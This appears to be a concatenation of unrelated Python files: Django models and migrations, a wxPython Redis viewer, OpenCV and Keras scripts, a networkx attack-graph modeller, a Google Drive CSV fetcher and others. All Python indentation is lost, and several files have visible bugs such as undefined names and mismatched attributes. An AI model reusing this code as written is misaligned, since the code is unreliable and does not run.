self.assertEqual(parser(), {"foo": 123})
# Second line is bogus
self.assertRaises(ValueError, parser)
if __name__ == '__main__':
unittest.main()
|
import re
def abbreviate(phrase):
regex = '[A-Z]+[a-z]*|[a-z]+'
return ''.join(word[0].upper() for word in re.findall(regex, phrase))
if __name__ == '__main__':
print(abbreviate('HyperText Markup language'))
|
# Generated by Django 3.0.8 on 2020-09-06 09:11
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('crm_user', '0003_auto_20200905_1900'),
]
operations = [
migrations.AlterField(
model_name='myuser',
name='roleid',
field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='users', to='crm_user.UserRole'),
),
]
|
# -*- coding: utf-8 -*-
#import re
import wx
class RedisDataGrid(wx.grid.Grid):
KEY_COL = 0
DATA_TYPE_COL = 1
VALUE_COL = 2
def __init__(self, parent, id):
wx.grid.Grid.__init__(self, parent, id, size=(1000, 500))
self._redis = None
self._data = None
self._last_line = 1
self.CreateGrid(2,3)
self.SetColLabelSize(0)
self.SetRowLabelSize(0)
#セルの横幅を指定
self.SetColSize(0, 350)
self.SetColSize(1, 350)
self.SetColSize(2, 350)
#ラベルの設定
self.SetCellValue(0, self.KEY_COL, "Key")
self.SetCellValue(0, self.DATA_TYPE_COL, "Data Type")
self.SetCellValue(0, self.VALUE_COL, "Value")
self._bind()
def _bind(self):
# セルの内容を変更
self.Bind(wx.grid.EVT_GRID_CELL_CHANGE, self._onCellCange)
# 右クリックでメニュー表示
self.Bind(wx.EVT_COMMAND_RIGHT_CLICK, self._on_right_up)
self.Bind(wx.EVT_RIGHT_UP, self._on_right_up)
def _on_right_up(self, evt):
"""
右クリックメニュー
"""
if not hasattr(self, "popup_id1"):
self.popup_id1 = wx.NewId()
self.Bind(wx.EVT_MENU, self._delete_data, id=self.popupID1)
menu = wx.Menu()
menu.Append(self.popup_id1, u"削除")
self.PopupMenu(menu)
menu.Destroy()
def _delete_data(self, evt):
print "delete event"
pass
def _onCellCange(self, evt):
row = evt.GetRow()
col = evt.GetCol()
#TODO KEYが変更されたときの仕様
value = self.GetCellValue(row, col)
key = self.GetCellValue(row, self.KEY_COL)
#list_match = re.compile('^\[[^\[|\]]*]$')
setattr(self._redis, key, value)
def generate_redis_data_grid(self, redis, callback=None):
self._redis = redis
self._data = self._redis.get_all(key=True)
self._clear_grid(1)
self._generate_redis_data_grid()
if callback:
callback()
def _generate_redis_data_grid(self):
for redis_data in self._data:
key = redis_data[0]
value = redis_data[1]
data_type = type(value).__name__
try:
self.SetCellValue(self._last_line, 0, key)
self.SetCellValue(self._last_line, 1, data_type)
self.SetCellValue(self._last_line, 2, value)
except wx._core.PyAssertionError:
print redis_data
pass
else:
self._update_last_line()
self.AppendRows(self._last_line)
def _clear_grid(self, num=None):
self._update_last_line(num)
self.ClearGrid()
def search_key_result(self, key):
if not self._redis:
return
keys = self._redis.keys(key)
datas = self._redis.get_by_keys(keys)
grid_data = []
for i,data in enumerate(datas):
grid_data.append([keys[i], data])
self._data = grid_data
self._clear_grid(1)
self._generate_redis_data_grid()
def _update_last_line(self, num=None):
if num:
self._last_line = num
else:
self._last_line += 1
def clear_data(self):
self.ClearGrid()
def get_redis(self):
return self._redis
class RedisDataPanel(wx.Panel):
def __init__(self, parent, id):
self._parent = parent
wx.Panel.__init__(self, parent, id, style=wx.BORDER_SUNKEN)
grid = wx.GridBagSizer(hgap=5, vgap=5)
self._rgrid = RedisDataGrid(self, -1)
grid.Add(self._rgrid, pos=(0,0))
self.SetSizerAndFit(grid)
def generate_redis_data_grid(self, redis):
self._parent.GetParent().settings_panel.update_lock_flag(True)
self._rgrid.generate_redis_data_grid(redis, lambda: self._parent.GetParent().settings_panel.update_lock_flag(False))
def search_key_result(self, key):
self._rgrid.search_key_result(key)
def get_redis(self):
return self._rgrid.get_redis
|
import cv2
import matplotlib.pyplot as plt
import numpy as np
img= cv2.imread("H:/Github/OpenCv/FaceRecognition/TrainingImages/img2.jpg")
# print(img.size)
# print(img.shape)
r,g,b = cv2.split(img) # get r,g,b
# print(r)
# print(g)
# print(b)
red = r[: , 0]
# print(red)
green = g[: , 0]
# print(len(green))
blue = b[: , 0]
# print(len(blue))
plt.plot(red,color='r')
plt.plot(green,color='g')
plt.plot(blue,color='b')
plt.show()
# plt.title('')
# plt.xlabel('')
# plt.ylabel('')
# plt.show() |
from django.urls import path
from . import views
urlpatterns = [
path('persons-list/', views.persons_list, name='persons_list'),
path('persons-create/', views.persons_create, name='persons_create'),
path('persons-update/<int:id>', views.persons_update, name='persons_update'),
path('persons-delete/<int:id>', views.persons_delete, name='persons_delete'),
] |
#TODO fix those methods - probably broke after moving stuff to separate files
def printDifference(pTable, gaussianPTable, n):
print("difference <- c(", end="")
first = True
for i in range(0, len(pTable[n])):
if first == False:
print(", ", end="")
print(-(pTable[n][i]-gaussianPTable[n][i]), end="")
first = False
print(")", end="")
def printEpsilon(pTable, gaussianPTable, n):
print("epsilon <- c(", end="")
first = True
for i in range(0, len(pTable[n])):
if first == False:
print(", ", end="")
difference = pTable[n][i]-gaussianPTable[n][i]
print(abs(difference/gaussianPTable[n][i]*100), end="")
first = False
print(")", end="")
def printPandPapprox(pTable, gaussianPTable, n):
print("p <- c(", end="")
first = True
for i in range(0, len(pTable[n])):
if first == False:
print(", ", end="")
print(pTable[n][i], end="")
first = False
print(")")
print("pApprox <- c(", end="")
first = True
for i in range(0, len(gaussianPTable[n])):
if first == False:
print(", ", end="")
print(gaussianPTable[n][i], end="")
first = False
print(")")
def calculateVtableStandardDeviations(vTable):
halfOfArraySize = int(math.floor(len(vTable[0])/2))
for n in range (1, len(vTable)):
tableRow = []
E = 0
N = 0
for V in range(len(vTable[0])):
if(vTable[n][V] != 0):
x = vTable[n][V]
E += ((V - halfOfArraySize) ** 2) * x
N += x
E = E / N
tableRow.append(E)
print(E)
print("done calculating V values")
table1 = []
table2 = []
def findWhenGaussianIsEffective(pTable, gaussianPTable):
table1 = []
table2 = []
for i in range(len(pTable)):
x = 0;
smallestP = 0
for j in range(len(pTable[0])):
if(pTable[i][j] != 0):
errorPresentage = (abs(gaussianPTable[i][j] - pTable[i][j])/ gaussianPTable[i][j]) * 100
if(errorPresentage < 50):
smallestP = pTable[i][j]
elif(x == 1):
table1.append(j - 1)
table2.append(smallestP)
x = 0
return table1, table2
def findHighestApproximationError(pTable, gaussianPTable):
nTable = []
for i in range(len(pTable)):
highestErrorList = []
lowValue = 0.1
highestApproximateError = 0
for j in range(len(pTable[0])):
p = pTable[i][j]
if(p < lowValue):
lowValue = lowValue / 10
highestErrorList.append(highestApproximateError)
highestApproximateError = 0
if(p == 0):
break
pApprox = gaussianPTable[i][j]
errorPresentage = abs(pApprox - p)/ pApprox * 100
if(errorPresentage > highestApproximateError):
#print(p)
#print(gaussianPTable[i][j])
#print(errorPresentage)
highestApproximateError = errorPresentage
nTable.append(highestErrorList)
if(i%10==0): print(i)
return nTable
def printHighestApproxPTable(table, nTable):
tableSize = len(table) - 1
for i in range(len(table[tableSize])):
number = 10 ** (i + 1)
name = "kuni" + str(1 / (number))
print(name + " <- c(", end="")
first = True
for j in range(len(table)):
if(not first):
print(", ", end="")
if(len(table[j]) > i ):
print(str(table[j][i]), end="")
else:
print("NA", end="")
first = False
print(")")
def printPvsPdata(Pexact, Papprox, n):
print(len(Pexact[n]))
print("pExact <- c(", end="")
first = True
for i in range(len(Pexact[n])):
if(Pexact[n][i] == 0):
break
if(not first):
print(", ", end="")
print(Pexact[n][i], end="")
first = False
print(")")
print("pApprox <- c(", end="")
first = True
for i in range(len(Papprox[n])):
if(Pexact[n][i] == 0):
break
if(not first):
print(", ", end="")
print(Papprox[n][i], end="")
first = False
print(")")
|
# Generates an attack graph of state nodes and vulnerability nodes
import networkx as nx
from input_parser import Parser
from state_node import StateNode
class GraphGenerator(object):
def __init__(self, startNodeSet, adjList, vulnDict, portDict):
self.startNodeSet = startNodeSet
self.adjList = adjList
self.vulnDict = vulnDict
self.portDict = portDict
# needs to link with network topology
def get_reachable(self, hostname):
reachableSet = self.adjList[hostname]
return reachableSet
def get_vulnerabilities(self, host, port):
if (host, port) not in self.vulnDict:
return None
return self.vulnDict[(host, port)]
def get_access_granted(self, vulnerabilityNode, currAccessLevel):
if vulnerabilityNode.accessVector == 'Network':
return vulnerabilityNode.accessLevel
elif vulnerabilityNode.accessVector == 'Local':
if currAccessLevel < vulnerabilityNode.accessLevel:
return vulnerabilityNode.accessLevel
else:
return currAccessLevel
def generate_graph(self):
DG = nx.DiGraph()
# add vulnerabilities for start nodes
for startNode in self.startNodeSet:
startNodePorts = self.portDict[startNode.hostname]
for port in startNodePorts:
vulnerabilitySet = self.get_vulnerabilities(startNode.hostname, port)
if not vulnerabilitySet:
continue
for vulnerabilityNode in vulnerabilitySet:
vulnerabilityNode.entry = True
if vulnerabilityNode.requiredPrivilege == 0:
startNode.accessLevel = vulnerabilityNode.accessLevel
DG.add_edge(vulnerabilityNode, startNode)
# print("Added edge from {} to {}".format(vulnerabilityNode.to_string(), startNode.to_string()))
stateNodeSet = self.startNodeSet
newStateNodes = set()
while stateNodeSet:
# iterate through each state node's reachable node set
for index, stateNode in enumerate(stateNodeSet):
# print("State node: {}".format(stateNode.to_string()))
host = stateNode.hostname
currAccessLevel = stateNode.accessLevel
reachableSet = self.get_reachable(host)
# reachable is a tuple (hostname, port)
for reachable in reachableSet:
# print("Host {} is reachable to host {}, port {}".format(host, reachable[0], reachable[1]))
vulnerablitySet = self.get_vulnerabilities(reachable[0], reachable[1])
if not vulnerablitySet: # No vulnerabilities associated
continue
# add each vulnerability node as the state node's child node if:
# 1) sufficient privilege level
# 2) reachable to port associated with that vulnerability
for vulnerabilityNode in vulnerablitySet:
# print("Reachable node {} has vulnerability {}".format(reachable, vulnerabilityNode.to_string()))
if (currAccessLevel >= vulnerabilityNode.requiredPrivilege) and not (vulnerabilityNode.accessVector == 'Local' and not host == reachable[0]):
if not DG.has_edge(vulnerabilityNode, stateNode) and not DG.has_edge(stateNode, vulnerabilityNode):
# print("No edge from {} to {}".format(vulnerabilityNode.to_string(), stateNode.to_string()))
DG.add_edge(stateNode, vulnerabilityNode)
# print("Added edge from {} to {}".format(stateNode.to_string(), vulnerabilityNode.to_string()))
newAccessLevel = self.get_access_granted(vulnerabilityNode, currAccessLevel)
vulnerableNode = StateNode(reachable[0], newAccessLevel)
if not DG.has_node(vulnerableNode):
newStateNodes.add(vulnerableNode)
# print("Adding {} to newStateNodes".format(vulnerableNode.to_string()))
if not DG.has_edge(vulnerabilityNode, vulnerableNode):
DG.add_edge(vulnerabilityNode, vulnerableNode)
# print("Added edge from {} to {}".format(vulnerabilityNode.to_string(), vulnerableNode.to_string()))
if index == len(stateNodeSet) - 1:
stateNodeSet = newStateNodes
newStateNodes = set()
# pos = nx.spring_layout(DG)
# nx.draw_networkx_nodes(DG, pos)
# nx.draw_networkx_edges(DG, pos)
# plt.show()
return DG
|
from django.db import models
from django.contrib.auth.models import User
class PatientFamily(models.Model):
user = models.ForeignKey(User)
last_name = models.CharField(max_length=30)
def __str__(self):
return self.last_name
class Patient(models.Model):
family = models.ForeignKey(PatientFamily)
last_name = models.CharField(max_length=30)
first_name = models.CharField(max_length=20)
def __str__(self):
return f"{self.last_name}, {self.first_name}"
class Schedule(models.Model):
patient = models.ForeignKey(Patient)
def __str__(self):
return self.patient.first_name + "'s Schedule"
class Vaccine(models.Model):
schedule = models.ForeignKey(Schedule)
name = models.CharField(max_length=50)
description = models.TextField()
def __str__(self):
return self.name
class Dose(models.Model):
vaccine = models.ForeignKey(Vaccine)
name = models.CharField(max_length=60)
given = models.BooleanField(default=False)
date = models.DateField(blank=True, null=True)
def __str__(self):
return f'{self.vaccine.schedule.patient.first_name} {self.vaccine.schedule.patient.last_name} - {self.name}'
|
#!/usr/bin/python
from sympy import Symbol, cos,sqrt, series
h = Symbol('h')
c = Symbol('c')
r0 = Symbol('r0')
P=r0/sqrt(r0**2-c*h**2)
print(series(P,h))
DP=diff(P,h)
print(series(P,h))
|
import csv
import httplib2
import logging
import pprint
import sys
from apiclient.discovery import build
from oauth2client.client import SignedJwtAssertionCredentials
from settings.local import *
logging.basicConfig()
def get_csv(client_email, client_key, document_id):
# Create an httplib2.Http object to handle our HTTP requests and authorize it
# with the Credentials. Note that the first parameter, service_account_name,
# is the Email address created for the Service account. It must be the email
# address associated with the key that was created.
scope = 'https://www.googleapis.com/auth/drive'
credentials = SignedJwtAssertionCredentials(CLIENT_EMAIL, client_key, scope=scope)
http = httplib2.Http()
http = credentials.authorize(http)
# Url to download the file in CSV
exportUrl = "https://docs.google.com/feeds/download/spreadsheets/Export?key=%s&exportFormat=csv&gid=0" % DOCUMENT_ID
print "Fetching: %s" % exportUrl
(headers, content) = http.request(exportUrl)
if headers.status != 200:
raise Exception("Error downloading CSV: %s" % content)
print "Got %s bytes" % headers['content-length']
return content
def main(argv):
# Load the key
with open(KEY_PATH, 'rb') as f:
key = f.read()
# Fetch the document as CSV
csv = get_csv(CLIENT_EMAIL, key, DOCUMENT_ID)
# Save it to disk
with open('submissions.csv', 'w') as f:
f.write(csv)
if __name__ == '__main__':
main(sys.argv)
|
# the relation between height and positioning error
import os
import numpy as np
from sklearn import preprocessing
import csv
import time
import random
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import pandas as pd
from keras import Input,Model
from keras.models import Sequential,save_model
from keras.layers import Dense,Activation,Dropout
from keras.optimizers import Adam,TFOptimizer
from keras.utils import plot_model
from keras.callbacks import ModelCheckpoint
from keras.models import load_model
def mkdir(newpath):
isExist = os.path.exists(newpath)
if isExist:
print("the path exists!")
return False
else:
print("the path is created successfully!")
os.makedirs(newpath)
return True
def read_csv(filename):
data = []
f = open(filename,'r')
line_reader=csv.reader(f)
for row in line_reader:
data.append(row)
data = np.array(data, dtype = float)
f.close
return data
train_features = read_csv('train_features.csv')
train_labels = read_csv('train_labels.csv')
test_features = read_csv('test_features_height.csv')
test_labels = read_csv('test_labels_height.csv')
newpath = "./plot_loss_value/"
mkdir(newpath)
model = load_model('./keras_debug_adm_final_1/L=3,N=215,act=elu,dropout=0.2,lr=0.001_84.51871490478516.hdf5')
loss=[]
prediction = []
time_list=[]
data_value = test_features
label_value = test_labels
for i in range(len(data_value)):
x = np.expand_dims(data_value[i], axis=0)
time_start = time.time()
predictation_i = model.predict(x)
time_end=time.time()
time_list.append(time_end-time_start)
prediction.append(predictation_i)
loss_i = label_value[i] - predictation_i
loss_i = np.linalg.norm(loss_i)
loss.append(loss_i)
print("*"*50,'\n step: %d'% i)
print("the real value is: ", label_value[i])
print("prediction value is : ", predictation_i)
print("posisitoning error is : %f"%loss_i)
print("the mean loss is :%f" % (np.mean(loss)))
dataframe = pd.DataFrame({"test_loss":loss})
dataframe.to_csv(newpath + 'MPE.csv')
loss_height = []
meanloss_height = []
height = []
for i in range(9):
height.append(test_labels[i*100,2])
axis_i = np.arange(i*100, (i+1)*100)
loss_height.append(np.array(loss)[axis_i])
meanloss_height.append(np.mean(loss_height[i]))
dataframe = pd.DataFrame({"height":height,"test_loss_mean":meanloss_height})
dataframe.to_csv(newpath + 'MPE_height.csv')
print(np.mean(time_list))
|
a = {
"code":1,
"data":
{
"totalPage":139,
"currentPage":1,
"totalItem":13894,
"itemCountPerPage":100,
"currentItems":
[
{
'expriedDate': '2017-05-24',
'startDate': '2016-05-24',
'createdByName': 'Pham Xuan Hung',
'service': None,
'type': 'Ki mi',
'status': 'Duyet',
'contractProducts':
[
{
'months': '12',
'expirationDate': '2017-05-24',
'price': '125370',
'productId': '120',
'discount': None,
'quantity': '1',
'vat': None
},
{
'months': '12',
'expirationDate': '2017-05-24',
'price': '125370',
'productId': '120',
'discount': None,
'quantity': '1',
'vat': None
}
],
'id': '8628',
'paid': None,
'accountName': 'Anh Tran Van Hung',
'accountId': '2884',
'value': '1504440',
'commissions':
[
{
'employeeName': 'Pham Xuan Hung',
'commission': '1504440',
'productId': '120',
'employeeId': '580',
'productName': 'Vchat'
},
{
'employeeName': 'Pham Xuan Hung',
'commission': '1504440',
'productId': '123',
'employeeId': '6543',
'productName': 'kubin'
}
],
'leadId': '53322',
'departmentId': '453',
'endDate': '2017-05-24',
'createdDateTime': '2016-05-24 09:34:37',
'companyId': '315'
}
]
}
}
arr_hd_ifo = []
for x in a['data']['currentItems']:
for y in x['commissions']:
arr1 = []
dateTime = x['createdDateTime'].split(' ')[0]
dem_id = x['departmentId']
typ = x['type']
com_id = x['companyId']
pro_id = y['productId']
pro_name = y['productName']
val = x['value']
arr1.extend((dateTime, dem_id, typ, com_id, pro_id, pro_name, val))
arr_hd_ifo.append(arr1)
b = {
'data':
{
'335':
{
'name': 'Stylelap',
'id': '335',
'status': '2',
'parentId': '324'
},
'4463':
{
'name': 'Stylelap',
'id': '335',
'status': '2',
'parentId': '324'
}
}
}
c = {
'data':
{
'557':
{
'name': 'Nhóm KD1',
'id': '557',
'status': '1',
'parentId': '556'
}
}
}
for z in arr_hd_ifo:
com_info = b['data'].get(z[3], -1)
room_info = c['data'].get(z[1], -1)
if(com_info != -1):
com_name = com_info['name']
else:
com_name = ''
if(room_info != -1):
room_name = room_info['name']
else:
room_name = ''
z.extend((com_name,room_name))
print(arr_hd_ifo)
def process_data_func():
pass
print('')
print ('K_K_K_K K_K_K_K B_B_B')
print ('K K K K B B')
print ('K K K K B B I')
print ('K K K K B B I I')
print ('K K K K B B I')
print ('K K K K B B')
print ('K K U_U_U U_U_U B B B_B_B_B I_I_I N_N_N N_N_N')
print ('K K K K U U U U B B B B I I N NN N N')
print ('K K K K U U U U B B B B I I N NNN N N P_P_PP K_K K_K')
print ('K K K K U U U U B B B B I I N N NN N N P P PP K K K K EEE R_RR_RR')
print ('K K K K U U U B B B B I I N N NN N N P P_PP A_A_AA R_RR_RR K K K EE EE R R R')
print ('K K K K U U B B B B I I N N NNN N P P AA AA R R R K K K K EE_EEE R R')
print ('K_K_K_K K_K_K_K U_U_U_U_U_U B_B_B B_B_B_B I_I_I N_N_N NN_N_N P_P A_A_AA;; R_R K_K K_K E_E_E_E R_R')
print ('') |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.